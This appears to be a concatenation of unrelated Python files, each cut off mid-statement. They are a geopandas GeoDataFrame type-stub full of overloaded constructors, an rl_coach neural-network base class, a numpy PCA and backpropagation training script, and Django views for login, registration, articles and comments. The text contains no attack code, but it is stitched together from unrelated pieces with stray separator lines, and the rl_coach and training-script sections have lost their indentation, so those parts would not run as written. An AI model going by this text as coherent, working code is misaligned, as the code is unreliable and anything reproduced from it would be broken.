Dict[
Literal["a", "geometry"],
Union[
shapely.geometry.multipoint.MultiPoint,
int,
shapely.geometry.point.Point,
],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[shapely.geometry.linestring.LineString, int],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[shapely.geometry.multilinestring.MultiLineString, int],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[
shapely.geometry.multilinestring.MultiLineString,
int,
shapely.geometry.linestring.LineString,
],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[shapely.geometry.multipolygon.MultiPolygon, int],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[
shapely.geometry.multipolygon.MultiPolygon,
int,
shapely.geometry.polygon.Polygon,
],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"], Union[None, int, shapely.geometry.point.Point]
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[Dict[Literal["a", "geometry"], Union[None, int]]],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[Dict[Literal["a", "geometry"], object]],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["value2", "value1", "geometry"],
Union[numpy.ndarray, geopandas.array.GeometryArray],
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geometry", "data"], Union[geopandas.geoseries.GeoSeries, List[int]]
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[shapely.geometry.point.Point],
columns: List[Literal["geom"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geometry", "col1"], Union[geopandas.array.GeometryArray, List[int]]
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: Dict[Literal["geometry"], List[int]]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self, /, data: geopandas.geoseries.GeoSeries, columns: List[Literal["col1"]]
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: Dict[Literal["col1"], geopandas.array.GeometryArray]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: Dict[Literal["col1"], geopandas.geoseries.GeoSeries]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: Dict[Literal["col2"], geopandas.geoseries.GeoSeries]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: list):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: Dict[Literal["col1"], List[int]]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: geopandas.geoseries.GeoSeries):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self, /, data: collections.defaultdict, index: List[Literal["b", "a"]]
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: collections.defaultdict, index: List[int]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["location", "B", "A"],
Union[List[shapely.geometry.point.Point], range],
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geometry", "location", "B", "A"],
Union[List[shapely.geometry.point.Point], range],
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geometry", "B", "A"],
Union[List[shapely.geometry.point.Point], numpy.ndarray, range],
],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geometry", "other_geom", "B", "A"],
Union[List[shapely.geometry.point.Point], range, numpy.ndarray],
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["Shape_Area", "Shape_Leng", "BoroName", "BoroCode", "geometry"],
Union[
Literal[
"Staten Island", "Queens", "Brooklyn", "Manhattan", "Bronx"
],
shapely.geometry.multipolygon.MultiPolygon,
int,
float,
],
]
],
columns: None,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["b", "geometry", "a"], Union[shapely.geometry.point.Point, int]
]
],
columns: None,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[Literal["a", "geometry"], Union[shapely.geometry.point.Point, int]]
],
columns: None,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["name", "lon", "lat", "geometry"],
Union[shapely.geometry.point.Point, float, Literal["a", "b", "c"]],
]
],
columns: None,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geom", "values"], List[Union[int, shapely.geometry.point.Point]]
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: | |
# <gh_stars>1000+  (corpus-boundary artifact; commented out so the file parses)
#
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, Dict, List, Tuple
import numpy as np
from rl_coach.base_parameters import AgentParameters
from rl_coach.saver import SaverCollection
from rl_coach.spaces import SpacesDefinition
class Architecture(object):
    @staticmethod
    def construct(variable_scope: str, devices: List[str], *args, **kwargs) -> 'Architecture':
        """
        Construct a network class using the provided variable scope and on requested devices
        :param variable_scope: string specifying variable scope under which to create network variables
        :param devices: list of devices (can be list of Device objects, or string for TF distributed)
        :param args: all other arguments for class initializer
        :param kwargs: all other keyword arguments for class initializer
        :return: an object which is a child of Architecture
        :raises NotImplementedError: always on this base class; concrete
            framework-specific subclasses must override this factory
        """
        raise NotImplementedError
    def __init__(self, agent_parameters: AgentParameters, spaces: SpacesDefinition, name: str= ""):
        """
        Creates a neural network 'architecture', that can be trained and used for inference.
        :param agent_parameters: the agent parameters
        :param spaces: the spaces (observation, action, etc.) definition of the agent
        :param name: the name of the network; a '/'-separated path whose first
            component selects the owning network wrapper (e.g. 'main/online')
        """
        self.spaces = spaces
        self.name = name
        self.network_wrapper_name = self.name.split('/')[0]  # e.g. 'main/online' --> 'main'
        self.full_name = "{}/{}".format(agent_parameters.full_name_id, name)
        # parameters of the wrapper this network belongs to; the wrapper name
        # must already be a key in agent_parameters.network_wrappers
        self.network_parameters = agent_parameters.network_wrappers[self.network_wrapper_name]
        # convenience aliases for commonly used hyper-parameters
        self.batch_size = self.network_parameters.batch_size
        self.learning_rate = self.network_parameters.learning_rate
        # populated by framework-specific subclasses when the graph is built
        self.optimizer = None
        self.ap = agent_parameters
    def predict(self,
                inputs: Dict[str, np.ndarray],
                outputs: List[Any] = None,
                squeeze_output: bool = True,
                initial_feed_dict: Dict[Any, np.ndarray] = None) -> Tuple[np.ndarray, ...]:
        """
        Given input observations, use the model to make predictions (e.g. action or value).
        :param inputs: current state (i.e. observations, measurements, goals, etc.)
            (e.g. `{'observation': numpy.ndarray}` of shape (batch_size, observation_space_size))
        :param outputs: list of outputs to return. Return all outputs if unspecified. Type of the list elements
            depends on the framework backend.
        :param squeeze_output: call squeeze_list on output before returning if True
        :param initial_feed_dict: a dictionary of extra inputs for forward pass.
        :return: predictions of action or value of shape (batch_size, action_space_size) for action predictions)
        :raises NotImplementedError: abstract on this base class
        """
        raise NotImplementedError
    @staticmethod
    def parallel_predict(sess: Any,
                         network_input_tuples: List[Tuple['Architecture', Dict[str, np.ndarray]]]) -> \
            Tuple[np.ndarray, ...]:
        """
        Run a forward pass for several networks in a single call.
        :param sess: active session to use for prediction
        :param network_input_tuples: tuple of network and corresponding input
        :return: list or tuple of outputs from all networks
        :raises NotImplementedError: abstract on this base class
        """
        raise NotImplementedError
    def train_on_batch(self,
                       inputs: Dict[str, np.ndarray],
                       targets: List[np.ndarray],
                       scaler: float=1.,
                       additional_fetches: list=None,
                       importance_weights: np.ndarray=None) -> Tuple[float, List[float], float, list]:
        """
        Given a batch of inputs (e.g. states) and targets (e.g. discounted rewards), takes a training step: i.e. runs a
        forward pass and backward pass of the network, accumulates the gradients and applies an optimization step to
        update the weights.
        Calls `accumulate_gradients` followed by `apply_and_reset_gradients`.
        Note: Currently an unused method.
        :param inputs: typically the environment states (but can also contain other data necessary for loss).
            (e.g. `{'observation': numpy.ndarray}` with `observation` of shape (batch_size, observation_space_size) or
            (batch_size, observation_space_size, stack_size) or
            `{'observation': numpy.ndarray, 'output_0_0': numpy.ndarray}` with `output_0_0` of shape (batch_size,))
        :param targets: target values of shape (batch_size, ). For example discounted rewards for value network
            for calculating the value-network loss would be a target. Length of list and order of arrays in
            the list matches that of network losses which are defined by network parameters
        :param scaler: value to scale gradients by before optimizing network weights
        :param additional_fetches: list of additional values to fetch and return. The type of each list
            element is framework dependent.
        :param importance_weights: ndarray of shape (batch_size,) to multiply with batch loss.
        :return: tuple of total_loss, losses, norm_unclipped_grads, fetched_tensors
            total_loss (float): sum of all head losses
            losses (list of float): list of all losses. The order is list of target losses followed by list
                of regularization losses. The specifics of losses is dependent on the network parameters
                (number of heads, etc.)
            norm_unclipped_grads (float): global norm of all gradients before any gradient clipping is applied
            fetched_tensors: all values for additional_fetches
        :raises NotImplementedError: abstract on this base class
        """
        raise NotImplementedError
    def get_weights(self) -> List[np.ndarray]:
        """
        Gets model weights as a list of ndarrays. It is used for synchronizing weight between two identical networks.
        :return: list weights as ndarray
        :raises NotImplementedError: abstract on this base class
        """
        raise NotImplementedError
    def set_weights(self, weights: List[np.ndarray], rate: float=1.0) -> None:
        """
        Sets model weights for provided layer parameters.
        :param weights: list of model weights in the same order as received in get_weights
        :param rate: controls the mixture of given weight values versus old weight values.
            i.e. new_weight = rate * given_weight + (1 - rate) * old_weight
            (rate=1.0 is a full copy; 0 < rate < 1 gives a soft/Polyak update)
        :return: None
        :raises NotImplementedError: abstract on this base class
        """
        raise NotImplementedError
    def reset_accumulated_gradients(self) -> None:
        """
        Sets gradient of all parameters to 0.
        Once gradients are reset, they must be accessible by `accumulated_gradients` property of this class,
        which must return a list of numpy ndarrays. Child class must ensure that `accumulated_gradients` is set.
        :raises NotImplementedError: abstract on this base class
        """
        raise NotImplementedError
    def accumulate_gradients(self,
                             inputs: Dict[str, np.ndarray],
                             targets: List[np.ndarray],
                             additional_fetches: list=None,
                             importance_weights: np.ndarray=None,
                             no_accumulation: bool=False) -> Tuple[float, List[float], float, list]:
        """
        Given a batch of inputs (i.e. states) and targets (e.g. discounted rewards), computes and accumulates the
        gradients for model parameters. Will run forward and backward pass to compute gradients, clip the gradient
        values if required and then accumulate gradients from all learners. It does not update the model weights,
        that's performed in `apply_and_reset_gradients` method.
        Once gradients are accumulated, they are accessed by `accumulated_gradients` property of this class.
        :param inputs: typically the environment states (but can also contain other data for loss)
            (e.g. `{'observation': numpy.ndarray}` with `observation` of shape (batch_size, observation_space_size) or
            (batch_size, observation_space_size, stack_size) or
            `{'observation': numpy.ndarray, 'output_0_0': numpy.ndarray}` with `output_0_0` of shape (batch_size,))
        :param targets: targets for calculating loss. For example discounted rewards for value network
            for calculating the value-network loss would be a target. Length of list and order of arrays in
            the list matches that of network losses which are defined by network parameters
        :param additional_fetches: list of additional values to fetch and return. The type of each list
            element is framework dependent.
        :param importance_weights: ndarray of shape (batch_size,) to multiply with batch loss.
        :param no_accumulation: if True, set gradient values to the new gradients, otherwise sum with previously
            calculated gradients
        :return: tuple of total_loss, losses, norm_unclipped_grads, fetched_tensors
            total_loss (float): sum of all head losses
            losses (list of float): list of all losses. The order is list of target losses followed by list of
                regularization losses. The specifics of losses is dependent on the network parameters
                (number of heads, etc.)
            norm_unclipped_grads (float): global norm of all gradients before any gradient clipping is applied
            fetched_tensors: all values for additional_fetches
        :raises NotImplementedError: abstract on this base class
        """
        raise NotImplementedError
    def apply_and_reset_gradients(self, gradients: List[np.ndarray], scaler: float=1.) -> None:
        """
        Applies the given gradients to the network weights and resets the gradient accumulations.
        Has the same impact as calling `apply_gradients`, then `reset_accumulated_gradients`.
        :param gradients: gradients for the parameter weights, taken from `accumulated_gradients` property
            of an identical network (either self or another identical network)
        :param scaler: A scaling factor that allows rescaling the gradients before applying them
        :raises NotImplementedError: abstract on this base class
        """
        raise NotImplementedError
    def apply_gradients(self, gradients: List[np.ndarray], scaler: float=1.) -> None:
        """
        Applies the given gradients to the network weights.
        Will be performed sync or async depending on `network_parameters.async_training`
        :param gradients: gradients for the parameter weights, taken from `accumulated_gradients` property
            of an identical network (either self or another identical network)
        :param scaler: A scaling factor that allows rescaling the gradients before applying them
        :raises NotImplementedError: abstract on this base class
        """
        raise NotImplementedError
def get_variable_value(self, variable: Any) -> np.ndarray:
"""
Gets value of a specified variable. Type of variable is dependant on the framework.
Example of a variable is head.kl_coefficient, which could be a symbol for evaluation
or could be a string representing the value.
:param variable: variable of interest
:return: value of the specified variable
| |
# <gh_stars>0  (corpus-boundary artifact; commented out so the file parses)
#!/usr/bin/python
# imported libraries
import gzip as gz
import numpy as np
import matplotlib.pyplot as plt
# digit data function 1 of 2
def seperate_data(filename):
    '''name: seperate_data
    description: loads a gzip-compressed, whitespace-delimited text file of
        samples where column 0 holds the label and the remaining columns
        hold the feature values, and splits it into observations and labels
    dependencies: none (gzip and numpy are imported at module level)
    inputs: filename - path to a gzip-compressed file parseable by np.loadtxt
    outputs: X - N x K matrix of observations (one row per sample)
             y - N-vector of labels (column 0 of the file)
    '''
    # np.loadtxt accepts the binary file object produced by gzip directly;
    # the with-block guarantees the file handle is closed
    with gz.open(filename) as f:
        data = np.loadtxt(f)
    # column 0 is the label; everything after it is a feature
    X = data[:, 1:]
    y = data[:, 0]
    return X, y
# digit data function 2 of 2
def vectorize_digit_labels(labels):
    '''name: vectorize_digit_labels
    description: function vectorizes (one-hot encodes) the labels of digits (0-9), for example:
                 0 == [1,0,0,0,0,0,0,0,0,0]
                 5 == [0,0,0,0,0,1,0,0,0,0]
                 9 == [0,0,0,0,0,0,0,0,0,1]
    dependencies: none
    inputs: labels - N x 1 vector of digit (0-9) labels
    outputs: labels_vectorized - N x num_unique matrix of one-hot rows
    '''
    # map each label to its rank among the unique labels and use that rank to
    # pick a row of the identity matrix; this matches the old per-sample loop
    # for dense 0..k-1 labels, but unlike indexing by the raw label value it
    # cannot run off the end of np.eye when a digit is missing from the sample
    unique_labels, label_indices = np.unique(labels, return_inverse=True)
    return np.eye(unique_labels.shape[0])[label_indices]
# dimension reduction function
def pca(data, k_features):
    '''name: pca
    description: projects the data onto its first k_features principal
        directions, taken from the SVD of the feature correlation matrix.
        NOTE(review): despite the original comments, the data is NOT centered
        here and np.corrcoef yields the *correlation* matrix, not the
        covariance -- both kept as-is to preserve existing behaviour.
    dependencies: none
    inputs: data - N x K matrix (rows = observations, columns = features)
            k_features - number of principal components to keep (0 < k <= K)
    outputs: reduced_data - N x k_features matrix
    raises: ValueError - if k_features is outside (0, data.shape[1]]
    '''
    # fail loudly on a bad k; the original printed a (broken) message and
    # silently fell through returning None
    if not (0 < k_features <= data.shape[1]):
        raise ValueError('0 < k_features <= %i required, got %r'
                         % (data.shape[1], k_features))
    # correlation matrix of the features (columns)
    sigma = np.corrcoef(data.T)
    # left singular vectors, ordered by decreasing singular value
    eigen_vecs, _, _ = np.linalg.svd(sigma)
    # one matrix product replaces the original per-observation projection loop
    return np.dot(data, eigen_vecs[:, :k_features])
# learning rate function
def delta_bar_delta(gamma, nabla_E, delta, up=0.1, down=0.1, phi=0.01):
    '''name: delta_bar_delta
    description: step size (gamma) is increased (additively, by `up`) whenever
                 the gradient keeps pointing the same way as the smoothed
                 history, and decreased (multiplicatively, by `down`) when the
                 algorithm jumps over a valley of the error function.
                 BUGFIX: the original computed `gamma[idx] + up` and
                 `gamma[idx] * down` but discarded the results, so the step
                 sizes never actually changed; the updates are now in-place.
    dependencies: none
    inputs: gamma - vector of step sizes (modified in place and returned)
            nabla_E - matrix of gradient errors
            delta - vector of exponentially averaged partial derivatives
    outputs: gamma - vector of updated step sizes
             delta_new - updated exponential average of the gradient
    '''
    # collapse the gradient error to one value per parameter row
    nabla_E_sum = np.sum(nabla_E, axis=1)[:, np.newaxis]
    # exponential moving average of the gradient direction
    delta_new = (1 - phi) * nabla_E_sum + phi * delta
    # the sign of this product says whether the gradient kept its direction
    direction = nabla_E_sum * delta
    gamma[direction > 0] += up    # same side as before: grow the step
    gamma[direction < 0] *= down  # jumped over a valley: shrink the step
    # zero product (either factor is 0) leaves gamma untouched
    return gamma, delta_new
# neural network function
def single_hidden_train(data, labels, num_features=None, k_units=20, iterations=1000, output_graph=False):
'''name: single_hidden_train
description: function learns the weights of a single hidden layer neural network
using a back propagation algorithm defined as:
1. Feed-forward computation
2. Backpropagation to the output layer
3. Backpropagation to the hidden layer
4. Weight updates using gradient descent
in addition, the function dispalys a plot of the error verses the number of
iterations; at this point the user may decide to continue the training or
exit the function
dependencies: delta_bar_delta
inputs: data - an N x K matrix with the rows representing observations and columns representing features
labels - matrix of vectorized labels
num_features - PCA is used to reduce the number of features, by default data is not reduced
k_units - number of hidden units
iterations - number of times the weights are updated
output_graph - allows user to perform another round of iterations based on a graph of the error
outputs: W_1 - trained weights for input layer
W_2 - trained weights for output of hidden layer
error_rate - final error rate of training data
'''
# check if dimensionality is to be reduced
if num_features: data = pca(data, num_features)
# get number of samples, features, and outputs
x_samples = data.shape[0]
n_features = data.shape[1]
m_outputs = labels.shape[1]
# intialize initial vectors of weights, with bias term added to last row
W_1_bar = np.random.uniform(0.01, 0.1, (n_features + 1, k_units)) # (N + 1) x K
W_2_bar = np.random.uniform(0.01, 0.1, (k_units + 1, m_outputs)) # (K + 1) x M
# define node functions sigmoid and sigmoid_prime
sigmoid = lambda vec_x: 1 / (1 + np.exp(-vec_x))
sigmoid_prime = lambda vec_x: sigmoid(vec_x) * (1 - sigmoid(vec_x))
# define error function
error_func = lambda vec_e: 0.5 * vec_e**2
# define initial gradient step sizes and deltas to be used in delta_bar_delta
gamma_1 = np.random.uniform(0.01, 0.1, (k_units, 1)) # K x 1
bar_delta_1 = np.zeros((k_units, 1)) # K x 1
gamma_2 = np.random.uniform(0.01, 0.1, (m_outputs, 1)) # M x 1
bar_delta_2 = np.zeros((m_outputs, 1)) # M x 1
# define offset and create arrays to store sample error & sum of errors
offset = 0
sample_error = np.zeros((x_samples,1))
sum_of_errors = np.zeros((iterations,1))
# while user chooses to continue
iterate = True
while iterate:
# iterate for specified number of steps
for iteration in range(iterations):
# loop through each sample
for sample_idx in range(x_samples):
# --------------------------------------------------------------------------------
# step one: feed-forward computation
# --------------------------------------------------------------------------------
# get input vector which, for consistancy, we will call output_0 and add bias term
output_0 = data[sample_idx,:][np.newaxis,:] # 1 x N
output_0_hat = np.hstack((output_0, np.ones((1, 1)))) # 1 x (N + 1)
# caculate output_1 and add bias term
output_1 = sigmoid(np.dot(output_0_hat, W_1_bar)) # 1 x K
output_1_hat = np.hstack((output_1, np.ones((1, 1)))) # 1 x (K + 1)
# caculate output_2 and convert to vectorized label
output_2 = sigmoid(np.dot(output_1_hat, W_2_bar)) # 1 x M
new_output_2 = np.zeros(output_2.shape)
new_output_2[:,np.argmax(output_2)] = 1
# caculate derivatives of output_1 and output_2 and store in diagonal matrices
D_1 = np.diagflat(sigmoid_prime(np.dot(output_0_hat, W_1_bar))) # K x K
D_2 = np.diagflat(sigmoid_prime(np.dot(output_1_hat, W_2_bar))) # M x M
# caculate difference in error
error_diff = new_output_2 - labels[sample_idx,:][np.newaxis,:] # 1 x M
# caculate sum of the sample's error
sample_error[sample_idx] = np.sum(error_func(error_diff))
# --------------------------------------------------------------------------------
# step two: backpropagation to the output layer
# --------------------------------------------------------------------------------
# define backpropagated error of output layer
delta_2 = np.dot(D_2, error_diff.T) # M x 1
# define error gradient of output layer
nabla_E_2 = np.dot(delta_2, output_1_hat) # M x (K + 1)
# --------------------------------------------------------------------------------
# step three: backpropagation to the hidden layer
# --------------------------------------------------------------------------------
# define backpropagated error of hidden layer
delta_1 = np.dot(D_1, np.dot(W_2_bar[:-1,:], delta_2)) # K x 1
# define error gradient of hidden layer
nabla_E_1 = np.dot(delta_1, output_0_hat) # K x (N + 1)
# --------------------------------------------------------------------------------
# step four: weight updates
# --------------------------------------------------------------------------------
# get gamma_1 and gamma_2 using delta-bar-delta
gamma_1, bar_delta_1 = delta_bar_delta(gamma_1, nabla_E_1, bar_delta_1)
gamma_2, bar_delta_2 = delta_bar_delta(gamma_2, nabla_E_2, bar_delta_2)
# update weights
W_1_bar += (-gamma_1 | |
from django.contrib import auth
from .models import *
from django.shortcuts import render, redirect, get_object_or_404
from sitio.forms import FormCreateUser, FormLogin, FormCreateArticle, FormCreateComment
from django.contrib.auth.models import User, Group
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from django.conf import settings
from django.contrib import messages
from django.views.generic import View
from django.http import JsonResponse
from datetime import date, datetime
from haystack.generic_views import SearchView
from django.db.models import Q
## TOKEN AUTH USER
from django.utils.http import urlsafe_base64_decode, urlsafe_base64_encode
from django.utils.encoding import force_bytes, force_text
from django.contrib.sites.shortcuts import get_current_site
from django.urls import reverse
from .tokenizer import token_generator
def home(request):  # landing page
    """Render the homepage with the ten most recently created articles."""
    latest = Article.objects.order_by("-date_created")[:10]
    cards = [
        {
            'title': art.title,
            'date_created': art.date_created,
            'link': '/articulo/' + str(art.id),
            'user': art.user,
            'image': art.image_one.url,
        }
        for art in latest
    ]
    return render(request, 'home.html', {'articles': cards})
def logear(request):  # log in an existing user
    """Log an existing user in.

    GET renders the login form; POST authenticates.  On failure a Spanish
    message explains whether the account is inactive, the password is
    wrong, or the user does not exist.  Already-authenticated users are
    redirected to the homepage.

    Fixes over the original: the failure diagnosis used to iterate over
    ``User.objects.all()`` in Python (O(n) and loads every row) — replaced
    with a direct filtered query; the ``next`` local shadowed the builtin
    and is renamed; the unused ``no_activo`` local is removed.
    """
    if not request.user.is_authenticated:
        form = FormLogin()
        mensajes = []
        if request.method == "POST":
            form = FormLogin(data=request.POST)
            if form.is_valid():
                username = form.cleaned_data['username']
                password = form.cleaned_data['password']
                user = authenticate(username=username, password=password)
                if user is not None:
                    if user.is_active:
                        auth.login(request, user)
                        # honor ?next= redirects coming from @login_required
                        next_url = request.POST.get('next')
                        if next_url:
                            return redirect(next_url)
                        return redirect('homepage')
                else:
                    # authenticate() failed: figure out why, with one query
                    # instead of scanning the whole user table in Python
                    username = form.cleaned_data['username']
                    usr = User.objects.filter(username=username).first()
                    if usr is not None:
                        if not usr.is_active:
                            mensajes.append('El usuario no está activo, verifique su email')
                        else:
                            mensajes.append('La contraseña ingresada es incorrecta')
                    else:
                        msj = 'El usuario "' + username + '" no existe'
                        mensajes.append(msj)
        context = {'form': form, 'messages': mensajes}
        return render(request, "login.html", context)
    else:
        return redirect('homepage')
def crear_usuario(request):  # register a new user
    """Register a new user account.

    The account is created deactivated, added to the 'comun' group, given
    an empty Profile, and emailed an activation link built from a
    uidb64/token pair (consumed by ``verificationview``).  Duplicate
    emails are rejected.

    Fix over the original: the duplicate-email check iterated over every
    ``User`` row in Python; replaced with a single ``.exists()`` query.
    """
    if not request.user.is_authenticated:
        mensajes = []
        if request.method == "POST":
            form = FormCreateUser(data=request.POST)
            if form.is_valid():
                validar_mail = request.POST['email']
                # single existence query instead of scanning all users
                if not User.objects.filter(email=validar_mail).exists():
                    user = form.save()
                    # account must be activated through the emailed link
                    user.is_active = False
                    grupo = Group.objects.get(name = 'comun')
                    user.groups.add(grupo)
                    Profile.objects.create(
                        user = user
                    )
                    uidb64 = urlsafe_base64_encode(force_bytes(user.pk))
                    domain = get_current_site(request).domain
                    link = reverse('activate',kwargs={'uidb64':uidb64,'token':token_generator.make_token(user)})
                    activate_url = 'http://'+domain+link
                    user.save()
                    email = EmailMessage(
                        'Hola ' +user.username+ '! Gracias por registrarte!',
                        'Activa tu cuenta mediante este link: '+ activate_url,
                        '<EMAIL>',
                        [user.email]
                    )
                    email.send(fail_silently=False)
                    return redirect('login')
                else:
                    mensajes.append('El mail ingresado ya existe')
                    form = FormCreateUser(data=request.POST)
            else:
                form = FormCreateUser(data=request.POST)
        else:
            form = FormCreateUser()
        context = {'form': form, 'messages': mensajes}
        return render(request, 'register.html', context)
    else:
        return redirect('homepage')
@login_required(login_url='login')
def mis_notifications(request):
    """List the current user's unread notifications."""
    unread = Notification.objects.all().filter(user = request.user).filter(is_readed = False)
    rows = [
        {'notif': n.context, 'notif_id': n.id, 'link': n.link}
        for n in unread
    ]
    return render(request, 'notifications.html', {'notifications': rows})
@login_required(login_url='login')  # login required to reach this page
def mis_articulos(request):
    """List the articles owned by the current user, with edit links."""
    owned = Article.objects.all().filter(user = request.user)
    rows = [
        {
            'title': art.title,
            'date_created': art.date_created,
            'link': '/articulo/' + str(art.id),
            'edit_article': '/articulo/edit/' + str(art.id),
            'image': art.image_one.url,
        }
        for art in owned
    ]
    return render(request, 'mis_articulos.html', {'articles': rows})
@login_required(login_url='login')
def edit_article(request, id):
    """Edit an existing article; only its owner may do so.

    NOTE(review): the form is bound to ``request.POST`` even on GET (an
    empty QueryDict), but it is only validated/saved after submission and
    the template renders from ``article`` directly, so this appears
    harmless — confirm against the template.
    """
    article = get_object_or_404(Article, id=id)
    form = FormCreateArticle(request.POST, request.FILES or None, instance=article)
    # root categories plus the siblings of the article's current category,
    # used to fill the two-level category selectors in the template
    parent_categories = Category.objects.filter(parent=None).values()
    child_categories = Category.objects.filter(parent=article.category.parent).values()
    if request.user == article.user:
        if form.is_valid():
            form.save()
            return redirect('mis_articulos')
        return render(request, 'edit_articulo.html', {'article': article, 'parent_categories': parent_categories, 'child_categories': child_categories})
    else:
        # not the owner: bounce to the homepage
        return redirect('homepage')
@login_required(login_url='login')
def delete_article(request, id):
    """Delete an article and return to the homepage.

    Security fix: the original deleted unconditionally, so ANY logged-in
    user could remove anyone's article by guessing its id.  Now only the
    owner may delete, mirroring the ownership check in ``edit_article``.
    """
    article = get_object_or_404(Article, id = id)
    if request.user == article.user:
        article.delete()
    return redirect('homepage')
@login_required()
def cargar_articulo(request):
    """Create a new article owned by the current user."""
    mensajes = []
    form = FormCreateArticle()
    if request.method == "POST":
        # re-bind so a failed validation re-renders with errors
        form = FormCreateArticle(request.POST, request.FILES)
        if form.is_valid():
            new_article = form.save(commit=False)
            new_article.user = request.user
            new_article.save()
            return redirect('mis_articulos')
    return render(request, 'cargar_articulo.html', {'form': form, 'messages': mensajes})
@login_required(login_url='homepage')  # requires an authenticated user
def logout(request):
    """Log the current user out and redirect to the homepage."""
    auth.logout(request)
    return redirect("homepage")
def article(request, id):
    """Article detail page with its comments.

    Fix: ``Article.objects.get`` raises an uncaught ``DoesNotExist``
    (HTTP 500) for a missing id; ``get_object_or_404`` returns a proper
    404 instead, consistent with the other views in this module.  The
    old ``if article:`` branch was dead code — ``.get()`` either returns
    an instance or raises — and is removed.
    """
    article = get_object_or_404(Article, pk=id)
    comments = Comment.objects.filter(article=article.id)
    return render(request, 'single-product.html', {'article': article, 'comments': comments})
def get_category(request, id):
    """JSON endpoint: root categories when ``id == '0'``, else the
    children of category ``id`` (used by the cascading selectors).

    Fix: the trailing ``pass`` after the return was dead code and is
    removed.  Non-GET requests still fall through (returning None, as
    before).
    """
    if request.method == "GET":
        if id == '0':
            categories = Category.objects.filter(parent=None).values()
        else:
            categories = Category.objects.filter(parent=id).values()
        return JsonResponse(list(categories), safe=False)
def get_articles_by_category(request, id):
    """JSON endpoint: summary dicts for every article in category ``id``."""
    if request.method == "GET":
        rows = [
            {
                'title': art.title,
                'date_created': art.date_created,
                'link': '/articulo/' + str(art.id),
                'edit_article': '/articulo/edit/' + str(art.id),
                'image': art.image_one.url,
                'category': art.category.title,
                'user': str(art.user),
            }
            for art in Article.objects.filter(category=id)
        ]
        return JsonResponse(rows, safe=False)
@login_required(login_url='login')
def comment(request, id):
    """Attach a comment to article ``id`` and bounce back to its page.

    Comments of 254+ characters are silently ignored.
    """
    if request.method == 'POST':
        target = Article.objects.get(pk=id)
        text = request.POST['comment']
        if len(text) < 254:
            Comment.objects.create(
                comment=text,
                user=request.user,
                article=target,
            )
    return redirect('detalle_articulo', id)
@login_required(login_url='login')  # login required to reach this page
def iniciar_canje(request, id_article):
    """Start a swap ("canje") between the current user and another user.

    POST: create the Canje, attach both users' selected articles, and
    notify the other party.  GET with ``id_article != '0'``: render the
    article-selection form.  GET with '0': redirect to 'mis_canjes'.

    NOTE(review): ``user_assignee`` is only bound inside the first loop —
    if ``articles`` is empty the later reference raises UnboundLocalError;
    presumably the form guarantees at least one selection — confirm.
    NOTE(review): POST with a 254+-char comment falls through to the
    final ``redirect('homepage')``.
    """
    if request.method == 'POST':
        # each entry looks like "<id> - <title>"; the id prefix is split off
